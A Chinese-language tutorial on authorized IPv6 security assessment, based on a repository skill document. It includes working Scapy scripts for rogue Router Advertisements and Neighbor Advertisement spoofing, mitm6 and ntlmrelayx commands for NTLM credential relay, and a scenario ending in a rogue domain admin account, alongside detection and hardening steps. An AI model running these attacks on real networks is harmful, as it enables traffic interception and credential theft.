Anthropic-Cybersecurity-Skills 实战:利用 SLAAC、路由通告与 IPv6 隧道漏洞开展双栈网络安全评估
2026/9/13 8:28:32 网站建设 项目流程

Anthropic-Cybersecurity-Skills 实战:利用 SLAAC、路由通告与 IPv6 隧道漏洞开展双栈网络安全评估

【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills

本篇技术指南基于开源仓库 Anthropic-Cybersecurity-Skills 中skills/exploiting-ipv6-vulnerabilities技能文档,系统讲解如何在获得授权的安全评估中识别并利用 IPv6 特有的安全缺陷,包括 SLAAC 欺骗、路由器通告(Router Advertisement)洪泛与 IPv6 隧道绕过。读完本文,你将掌握一套从 IPv6 网络枚举、mitm6 中间人攻击、Scapy 伪造 RA 报文,到 IPv6 防火墙一致性验证的完整实战流程,并能借助仓库自带的agent.py自动化评估脚本将发现固化为可复用的风险评估报告。

技能定位与适用场景

该技能面向的是现代网络中普遍存在却常常被忽视的盲区:双栈(Dual-Stack)网络的安全控制一致性。在企业同时运行 IPv4 与 IPv6 的环境中,安全团队往往只加固了 IPv4 侧的防火墙、ACL 与监控规则,而 IPv6 侧可能完全裸露。

根据 SKILL.md 的定义,该技能适用于以下评估场景:

  • 验证双栈网络中 IPv4 与 IPv6 流量是否具备一致的安全控制措施;
  • 证明在仅官方支持 IPv4 的网络中,未受管理的 IPv6 所带来的真实风险;
  • 利用 SLAAC 与 Router Advertisement 机制对 IPv6 流量实施中间人(MITM)攻击;
  • 测试 IPv6 感知的防火墙规则与 IDS/IPS 对 IPv6 特有攻击模式的检测能力;
  • 识别可绕过 IPv4 单栈安全控制的 IPv6 隧道协议(6to4、Teredo、ISATAP)。

重要边界:本技能对应 SKILL.md 中的明确警示——未经书面授权不得用于生产网络;不得针对 IPv6 中断可能引发安全问题(如 ICS/OT 环境)的系统使用;不得用于对网络基础设施的拒绝服务攻击。

前置条件与工具准备

开始评估前需要具备以下条件(源自 SKILL.md 的 Prerequisites 章节):

前置条件说明
书面授权明确界定 IPv6 测试范围与获批的技术手段
Kali Linux 环境预装 THC-IPv6 Toolkit、Scapy 与 mitm6
网络接口位于目标网段且支持 IPv6
知识储备理解 IPv6 编址、SLAAC、NDP(邻居发现协议)与 Router Advertisement
抓包工具Wireshark 用于捕获与分析 IPv6 流量

评估过程将使用以下核心工具:

  • mitm6:利用 Windows 主机对 DHCPv6 的默认偏好,伪装成 IPv6 DNS 服务器实施 MITM;
  • THC-IPv6 Toolkit:包含 alive6、parasite6、fake_router6 及洪泛工具的完整 IPv6 攻击套件;
  • Scapy:Python 报文构造库,用于自定义 ICMPv6 RA 与 NDP 报文;
  • ndpmon:IPv6 NDP 监视器,用于检测恶意 RA 与 NDP 欺骗;
  • Nmap:完整支持 IPv6 的网络扫描器,含组播发现与 IPv6 专项脚本。

六步评估工作流总览

整个评估过程由 6 个步骤组成,呈"侦察 → 攻击 → 验证 → 加固建议"的完整闭环:

  1. 枚举网络中的 IPv6 主机与路由通告
  2. 基于 SLAAC 的 mitm6 中间人攻击
  3. 使用 Scapy 伪造路由器通告(Rogue RA)
  4. IPv6 邻居发现攻击(NDP 欺骗)
  5. IPv6 隧道检测与利用
  6. IPv6 防火墙规则测试与结果文档化

第一步:枚举网络中的 IPv6

评估的起点是摸清目标网段的 IPv6 现状——哪些主机启用了 IPv6、是否存在路由器通告、有无 DHCPv6 服务。以下命令组成了完整的侦察流程(源自 SKILL.md 的 Step 1):

# 检查本地接口是否启用 IPv6 ip -6 addr show # 通过组播发现本地链路上的 IPv6 主机 ping6 -c 3 ff02::1%eth0 # ff02::1 = all-nodes 组播地址 # 使用 THC-IPv6 套件的 alive6 发现主机 sudo alive6 eth0 # 用 Nmap 扫描 IPv6 主机 nmap -6 --script ipv6-multicast-mld-list -e eth0 nmap -6 -sn --script targets-ipv6-multicast-echo -e eth0 # 检查网络上的路由器通告 sudo tcpdump -i eth0 -n -v icmp6 and 'ip6[40] == 134' # Type 134 = Router Advertisement # 使用 radvdump 捕获现有 RA sudo radvdump # 检查 DHCPv6 服务器 sudo dhclient -6 -v eth0 --request-only

其中ip6[40] == 134是理解 RA 的关键:IPv6 报文在固定偏移 40 字节处是下一个报头类型(Next Header),134 对应 ICMPv6 的 Router Advertisement 类型。而ff02::1是链路本地 all-nodes 组播地址,向它发送 Echo Request 即可探明同一链路内的所有 IPv6 主机。

这一"发现"逻辑在仓库的自动化脚本 agent.py 中被复现为discover_ipv6_hosts()函数——它向ff02::1发送 ICMPv6 Echo Request,并借助 Scapy 的sr()发送/接收原语收集回复,最后返回包含ipv6_address与 MAC 地址的主机列表。从源码结构看,脚本的 capture_router_advertisements() 则对应上文tcpdump/radvdump的监听职责,用sniff()抓取 ICMPv6 报文并解析 RA 中的前缀、DNS 服务器与标志位。

第二步:基于 SLAAC 的 mitm6 中间人攻击

mitm6 的核心攻击原理是利用 Windows 系统的默认行为:当主机看到路由器通告后,会主动通过 DHCPv6 请求 IPv6 配置,而 mitm6 会抢先响应这些请求,让自己成为受害者的 IPv6 DNS 服务器,从而接管所有 DNS 查询(源自 SKILL.md 的 Step 2):

# mitm6 利用 Windows 主机的默认行为:收到 RA 后通过 DHCPv6 请求 IPv6 配置 # 启动 mitm6,成为 IPv6 DNS 服务器 sudo mitm6 -d example.com -i eth0 # mitm6 执行以下动作: # 1. 发送 Router Advertisements 以在受害主机上启用 IPv6 # 2. 响应 DHCPv6 请求,将自身指定为 DNS 服务器 # 3. 受害主机开始向攻击者发送 IPv6 DNS 查询 # 4. 攻击者可以用伪造的 DNS 应答进行响应 # 结合 ntlmrelayx 进行凭据中继 sudo impacket-ntlmrelayx -6 -tf targets.txt -wh fake-wpad.example.com -l /tmp/loot # 该攻击链利用: # 1. 通过 DNS 的 WPAD(Web Proxy Auto-Discovery) # 2. Windows 向 WPAD 代理发送 NTLM 认证 # 3. ntlmrelayx 将凭据中继到目标服务器

这条攻击链的关键是WPAD + NTLM 中继:当 mitm6 接管 DNS 后,受害主机会通过 WPAD 自动发现机制请求wpad.example.com,攻击者伪造的 WPAD 响应会引导浏览器代理指向攻击者;随后 Windows 在访问代理时自动携带 NTLM 凭据,ntlmrelayx再将这些凭据中继到目标服务器(如域控制器),实现凭据劫持。这条链路完整对应 MITRE ATT&CK 的 T1557(Adversary-in-the-Middle)与 T1040(Network Sniffing)。

第三步:使用 Scapy 伪造路由器通告(Rogue RA)

当网络中没有现成的 IPv6 路由器时,攻击者可以直接伪造 RA 报文,让受害主机把攻击者当作默认 IPv6 路由器来配置自身网络。以下完整代码来自 SKILL.md 的 Step 3,可用于授权测试环境:

#!/usr/bin/env python3 """Rogue Router Advertisement for authorized IPv6 testing.""" from scapy.all import * from scapy.layers.inet6 import * # Craft a Router Advertisement packet # This makes the attacker appear as the default IPv6 router iface = "eth0" attacker_mac = get_if_hwaddr(iface) attacker_ipv6 = get_if_addr6(iface) ra = ( Ether(dst="33:33:00:00:00:01") / # All-nodes multicast IPv6(src=attacker_ipv6, dst="ff02::1") / ICMPv6ND_RA( routerlifetime=1800, # Advertise as router for 30 min prf=1, # High preference M=0, # No managed flag (use SLAAC) O=1 # Other config via DHCPv6 (DNS) ) / ICMPv6NDOptSrcLLAddr(lladdr=attacker_mac) / ICMPv6NDOptPrefixInfo( prefix="2001:db8:dead::", # Rogue prefix prefixlen=64, L=1, A=1, validlifetime=3600, preferredlifetime=1800 ) / ICMPv6NDOptRDNSS( dns=[attacker_ipv6], # Attacker as DNS server lifetime=1800 ) ) print(f"[*] Sending rogue Router Advertisement from {attacker_ipv6}") print(f"[*] Advertising prefix 2001:db8:dead::/64") sendp(ra, iface=iface, count=5, inter=2) print("[*] RA packets sent. Victims will configure IPv6 with rogue prefix.")

这段代码逐层剖析了 RA 报文的结构:

  • ICMPv6ND_RA首部字段routerlifetime=1800让受害主机将攻击者视为有效期为 30 分钟的路由器;prf=1声明高优先级,确保攻击者路由被优先选用;M=0表示不启用受管标志(强制走 SLAAC),O=1表示其他配置(如 DNS)通过 DHCPv6 获取;
  • ICMPv6NDOptPrefixInfo:通告一个伪造前缀2001:db8:dead::/64L=1表示该前缀可用于链路寻址,A=1表示允许通过 SLAAC 自动配置地址,有效期 1 小时、首选期 30 分钟;
  • ICMPv6NDOptRDNSS:把攻击者自身地址指定为受害主机的 DNS 服务器,与第二步的 mitm6 思路殊途同归。

攻击效果:受害主机将基于伪造前缀配置 IPv6 地址,并把攻击者当作默认网关与 DNS 服务器,此后其 IPv6 流量全部流经攻击者。

第四步:IPv6 邻居发现攻击(NDP 欺骗)

NDP(Neighbor Discovery Protocol)是 ARP 在 IPv6 中的替代协议,负责地址解析、路由器发现与重复地址检测。正如 ARP 欺骗是 IPv4 局域网经典攻击,NDP 同样存在欺骗风险——攻击者可以伪造 Neighbor Advertisement(NA)报文,告诉受害主机"我就是网关"(源自 SKILL.md 的 Step 4):

# Neighbor Advertisement 欺骗(IPv6 版 ARP 欺骗) # 使用 THC-IPv6 套件的 parasite6 工具 sudo parasite6 eth0 # 或使用 Scapy 手工构造 python3 << 'PYEOF' from scapy.all import * from scapy.layers.inet6 import * # 伪造 Neighbor Advertisement 以重定向流量 target_ipv6 = "2001:db8::50" # Victim IPv6 address gateway_ipv6 = "2001:db8::1" # Gateway IPv6 address attacker_mac = get_if_hwaddr("eth0") # 告诉受害主机:我们是网关 na = ( Ether(dst="33:33:00:00:00:01") / IPv6(src=gateway_ipv6, dst="ff02::1") / ICMPv6ND_NA( tgt=gateway_ipv6, R=1, S=0, O=1 # Router flag, Override flag ) / ICMPv6NDOptDstLLAddr(lladdr=attacker_mac) ) print("[*] Sending spoofed Neighbor Advertisements...") sendp(na, iface="eth0", count=100, inter=1) PYEOF # 用 ndpmon 检测 NDP 欺骗 sudo ndpmon -i eth0

代码中R=1(Router 标志)声明该地址是路由器、O=1(Override 标志)强制覆盖受害主机邻居缓存中的既有条目——正是Override标志使攻击者能够"挤掉"真实网关在受害者缓存中的记录。parasite6则自动完成同样的欺骗流程。防御侧可用ndpmon持续监控链路,对异常 NA/RA 报警。

从源码看,仓库 agent.py 中的detect_rogue_ra()实现了 NDP/RA 监测的检测侧逻辑:将捕获到的 RA 源地址与--known-routers白名单比对,任何不在白名单内的源地址都会被标记为ROGUE_ROUTER_ADVERTISEMENT告警,并输出其源 IP、源 MAC、路由器生命周期与通告前缀——这与ndpmon的职责一致,且让评估者同时掌握"攻击侧"与"检测侧"两种视角。

第五步:IPv6 隧道检测与利用

IPv6 隧道(6to4、Teredo、ISATAP)允许 IPv6 报文封装在 IPv4 中传输,这为安全评估者提供了一个"绕道"路径:即使 IPv4 防火墙规则再严格,只要允许隧道流量,攻击者就能通过隧道直接访问 IPv4 侧受保护的服务(源自 SKILL.md 的 Step 5):

# 检测 Teredo 隧道(IPv6 over UDP 3544 端口) sudo tshark -i eth0 -Y "udp.port == 3544" -T fields -e ip.src -e ip.dst # 检测 6to4 隧道(协议号 41) sudo tshark -i eth0 -Y "ip.proto == 41" -T fields -e ip.src -e ip.dst # 检测 ISATAP 隧道 sudo tshark -i eth0 -Y "ip.proto == 41 and ipv6.dst contains \"::5efe:\"" -c 10 # 扫描启用 Teredo 的主机 nmap -6 -sU -p 3544 --open 10.10.0.0/24 # 测试 IPv6 隧道是否能绕过 IPv4 防火墙规则 # 如果允许 Teredo,IPv6 流量可以绕过 IPv4-only 防火墙 curl -6 http://[2001:db8::50]:8080/ # 通过 IPv6 隧道访问 # 在防火墙上阻断不需要的 IPv6 隧道 # iptables:阻断协议 41(6to4、ISATAP)与 Teredo sudo iptables -A INPUT -p 41 -j DROP sudo iptables -A OUTPUT -p 41 -j DROP sudo iptables -A INPUT -p udp --dport 3544 -j DROP sudo iptables -A OUTPUT -p udp --dport 3544 -j DROP

三种隧道的识别特征非常清晰:

隧道类型封装方式检测特征
TeredoIPv6 over UDP 3544udp.port == 3544
6to4IPv6 over IP protocol 41ip.proto == 41
ISATAPIPv6 over IP protocol 41ip.proto == 41且 IPv6 地址含::5efe:

其中 ISATAP 地址的5efe段是其标识性特征(2001:db8::5efe:192.168.1.5表示内嵌的 IPv4 地址)。测试时,如果目标主机通过 Teredo 获得了 IPv6 地址,那么即使 IPv4 防火墙对其完全封锁,curl -6依然可能访问到它监听的 8080 端口服务——这直接证明了"IPv4 单栈防护可被 IPv6 隧道绕过"的风险。

仓库 agent.py 的check_tunnel_protocols()函数以嗅探方式实现了同样的检测:匹配 UDP 3544 端口判定 Teredo,匹配 IP 协议号 41 判定 6to4/ISATAP,并返回结构化结果供报告使用。

第六步:测试 IPv6 防火墙规则并输出结果

最后一步回归"一致性验证"这一核心目标:确认 ip6tables 是否镜像了 iptables 的防护(源自 SKILL.md 的 Step 6):

# 验证 ip6tables 规则是否就位 sudo ip6tables -L -n -v # 测试 IPv6 防火墙是否与 IPv4 规则一致 # 常见疏漏:IPv4 防火墙很严格,IPv6 却门户大开 nmap -6 -sS -p- <target_ipv6_address> # 对比 IPv4 与 IPv6 扫描结果 nmap -sS -p 1-1024 10.10.20.10 -oA ipv4_scan nmap -6 -sS -p 1-1024 2001:db8::10 -oA ipv6_scan diff <(grep "open" ipv4_scan.nmap) <(grep "open" ipv6_scan.nmap) # 检查交换机是否启用了 IPv6 RA Guard # Cisco: show ipv6 snooping policies # 若未启用,将其记录为发现项 # 清理:停止所有 IPv6 攻击工具 sudo killall mitm6 parasite6 2>/dev/null

这份脚本给出了一个简洁的规则一致性判定方法:分别对同一主机的 IPv4 与 IPv6 地址执行同范围端口扫描,再用diff比较开放端口列表。若 IPv6 侧开放的端口远多于 IPv4 侧,即为"IPv4 有防护、IPv6 裸奔"的直接证据。同时还应核查交换机的 RA Guard(show ipv6 snooping policies)与 IPv6 ACL 配置情况,评估结束后务必清理所有攻击工具进程。

仓库脚本 agent.py 中的check_ipv6_firewall()对该步骤做了自动化:通过subprocess执行ip6tables -L -n --line-numbers,统计规则条目数并截取前 20 条规则;当规则数为 0 时,generate_assessment() 会将其汇总为"HIGH: No ip6tables rules configured"风险发现。

关键概念速查表

以下概念贯穿整个评估过程,源自 SKILL.md 的 Key Concepts 章节:

术语定义
SLAAC(无状态地址自动配置)IPv6 主机无需 DHCP 服务器、直接从 Router Advertisement 自动配置地址的机制;可通过恶意 RA 注入被利用
Router Advertisement(RA)路由器通告网络前缀、默认网关与 DNS 配置的 ICMPv6 报文;恶意 RA 可发起 MITM 攻击
NDP(邻居发现协议)IPv6 中替代 ARP 的协议,使用 ICMPv6 完成地址解析、路由器发现与重复地址检测;易受欺骗攻击
mitm6利用 Windows 对 DHCPv6 的偏好成为 IPv6 DNS 服务器,实现 DNS 欺骗与 NTLM 凭据中继的工具
RA Guard交换机级安全特性,过滤恶意 Router Advertisement,阻止未授权主机伪装成 IPv6 路由器
IPv6 隧道将 IPv6 报文封装进 IPv4(6to4、Teredo、ISATAP)的机制,可绕过 IPv4 单栈安全控制与防火墙

典型场景:利用 IPv4-only 企业网络中的未管理 IPv6

以下为技能文档给出的高价值实战场景(源自 SKILL.md 的 Common Scenarios):

背景:某公司企业网络官方只使用 IPv4,但 Windows 工作站默认启用 IPv6。内网渗透测试期间,测试者发现 VLAN 上 IPv6 处于活跃状态,且未部署任何 IPv6 安全控制(无 RA Guard、无 IPv6 ACL)。

攻击路径

  1. 发现所有 Windows 工作站都拥有链路本地 IPv6 地址,并正在监听 Router Advertisement;
  2. 运行 mitm6 发送 DHCPv6 响应,成为该 VLAN 上所有 Windows 主机的 IPv6 DNS 服务器;
  3. 配置 ntlmrelayx 将 WPAD 触发的 NTLM 认证中继到域控制器;
  4. 5 分钟内捕获并中继 12 台工作站的 NTLM 凭据,获得文件共享访问权限;
  5. 成功中继一名域管理员的 NTLM 哈希,创建新的域管理员账户;
  6. 记录结论:缺乏 IPv6 安全控制即可在不利用任何传统漏洞的情况下实现完整的域沦陷
  7. 建议:在不需要 IPv6 的地方禁用 IPv6、在交换机上部署 RA Guard、在防火墙阻断 DHCPv6。

常见陷阱(Pitfalls)

  • 向网络洪泛 Router Advertisement 可能导致部分设备不稳定;
  • mitm6 影响 VLAN 上的所有Windows 主机而非仅目标主机——确保测试范围覆盖所有可能受影响的机器;
  • 部分环境存在依赖 IPv6 的服务(SCCM、某些 Azure 服务),IPv6 中断会导致其故障;
  • 不要忘记排查 IPv6 隧道协议,它们可能提供替代攻击路径。

报告输出模板

评估结论应结构化呈现,以下为 SKILL.md 提供的报告骨架:

## IPv6 Security Assessment Report **Test ID**: IPV6-2024-001 **Target Network**: VLAN 10 (10.10.10.0/24, no official IPv6) **Assessment Date**: 2024-03-15 ### IPv6 Discovery | Finding | Details | |---------|---------| | IPv6 Enabled Hosts | 147/150 workstations (Windows default) | | Link-Local Addresses | Active on all discovered hosts | | Router Advertisements | None detected (no IPv6 router) | | DHCPv6 Server | None present | | RA Guard | NOT configured on switches | | IPv6 Firewall Rules | NONE (ip6tables empty) | ### Attack Results | Attack | Result | Impact | |--------|--------|--------| | mitm6 DNS Takeover | SUCCESS | Became IPv6 DNS for 147 hosts | | WPAD NTLM Relay | SUCCESS | Captured 23 NTLM authentications | | Domain Admin Relay | SUCCESS | Created rogue domain admin account | | IPv6 Port Scan | SUCCESS | All ports open (no ip6tables rules) | ### Recommendations 1. Deploy RA Guard on all access-layer switches (Critical) 2. Configure IPv6 ACLs mirroring IPv4 firewall rules (Critical) 3. Disable DHCPv6 client via Group Policy where IPv6 is not needed 4. Block IPv6 tunneling protocols (6to4, Teredo) at the firewall 5. Deploy IPv6-aware IDS rules for NDP spoofing detection

报告遵循"发现 → 攻击结果 → 修复建议"三段式结构,且每条建议明确标注优先级,便于后续整改与复测。

源码级深化:用 agent.py 自动化 IPv6 安全评估

该技能不仅给出手工流程,还附带了一个完整的自动化评估 Agent。其依赖、CLI 用法与函数契约记录在 api-reference.md 中,唯一运行时依赖为scapy >= 2.5。CLI 用法如下:

sudo python skills/exploiting-ipv6-vulnerabilities/scripts/agent.py \ --interface eth0 \ --known-routers "fe80::1" "fe80::2" \ --output ipv6_report.json

各命令行参数的语义(对应 agent.py 中的argparse定义):

参数默认值说明
--interfaceeth0进行抓包与发包的网络接口
--known-routers[]合法路由器的 IPv6 地址白名单,用于 rogue RA 判定
--outputipv6_assessment.json评估报告输出路径

脚本内部将前文 6 个手工步骤的检测侧逻辑全部封装为独立函数,形成了与 SKILL.md 工作流一一对应的模块化设计:

函数对应步骤核心行为
discover_ipv6_hosts(interface, timeout)Step 1ff02::1发送 ICMPv6 Echo Request 并收集应答
capture_router_advertisements(interface, timeout)Step 1嗅探 ICMPv6 类型 134 报文,提取前缀、DNS 服务器与标志位
detect_rogue_ra(ras, known_routers)Step 4 检测侧将 RA 源地址与白名单比对,标记 rogue RA
check_ipv6_firewall()Step 6执行ip6tables -L -n,空规则集被标记
check_tunnel_protocols(interface, timeout)Step 5嗅探 Teredo(UDP 3544)、6to4(协议 41)、ISATAP 隧道流量
generate_assessment(interface, known_routers)全部编排所有检查并生成最终评估报告

在 Scapy 层的实现上,脚本复用了与手工攻击代码相同的报文结构——ICMPv6ND_RA负责 RA 解析、ICMPv6NDOptPrefixInfo提取前缀信息、ICMPv6NDOptRDNSS提取 DNS 服务器、ICMPv6EchoRequest用于组播主机发现。这印证了手工测试与自动化评估在报文层面的同源性:理解 RA/NDP 报文结构,既能构造攻击报文,也能编写检测逻辑。

generate_assessment()的输出采用结构化 JSON Schema(示例见 api-reference.md),覆盖ipv6_hosts_discoveredrouter_advertisementsrogue_rasfirewall_statustunnel_protocolsrisk_findings六个维度,其中风险发现按严重度分级(如CRITICAL: 1 rogue Router Advertisements detectedHIGH: No ip6tables rules configuredMEDIUM: Teredo tunnel traffic detected),可直接对接前文的报告模板或 SIEM 平台。

框架映射与合规对齐

该技能在前置元数据中已明确映射到两大安全框架(见 SKILL.md 头部 frontmatter):

  • MITRE ATT&CK:T1046(网络服务发现)、T1040(网络嗅探)、T1557(中间人攻击)、T1071(应用层协议通信)——覆盖从侦察到流量劫持的完整攻击链;
  • NIST CSF 2.0:PR.IR-01(网络完整性保护)、DE.CM-01(网络监控)、ID.AM-03(资产清点)、PR.DS-02(传输中的数据保护)——对应本技能在保护、检测与识别三大职能上的安全控制验证价值。

在编写评估报告时,可将每项发现与上述 ATT&CK 技术 ID 和 CSF 控制类别关联,使结果既能指导红队复现,也能为蓝队检测工程提供输入,从而让一次 IPv6 安全评估同时服务于攻防两端的能力建设。

总结

IPv6 不是"未来的网络"——在默认启用 IPv6 的操作系统与自动隧道机制的推动下,它已经在绝大多数企业网络中悄然运行。本技能揭示的核心教训在于:安全团队不能假设"未管理"等于"不存在",IPv6 侧的安全控制必须与 IPv4 同步设计、同步部署、同步验证。通过本文的六步工作流,评估者可以从枚举、SLAAC/RA 攻击、NDP 欺骗、隧道绕过到防火墙一致性验证,系统性地识别双栈网络中的盲区;借助仓库自带的 agent.py 自动化脚本,则可将这一过程固化为可重复、可量化、可对接 SIEM 的常态化安全评估能力。所有测试手段务必在书面授权范围内使用,在受控环境中验证,最终以结构化报告推动 RA Guard、IPv6 ACL、DHCPv6 管控与隧道阻断等真实防御措施的落地。

【免费下载链接】Anthropic-Cybersecurity-Skills817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io standard · Works with Claude Code, GitHub Copilot, Codex CLI, Cursor, Gemini CLI & 20+ platforms · 29 security domains · Apache 2.0项目地址: https://gitcode.com/GitHub_Trending/an/Anthropic-Cybersecurity-Skills

创作声明:本文部分内容由AI辅助生成(AIGC),仅供参考

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询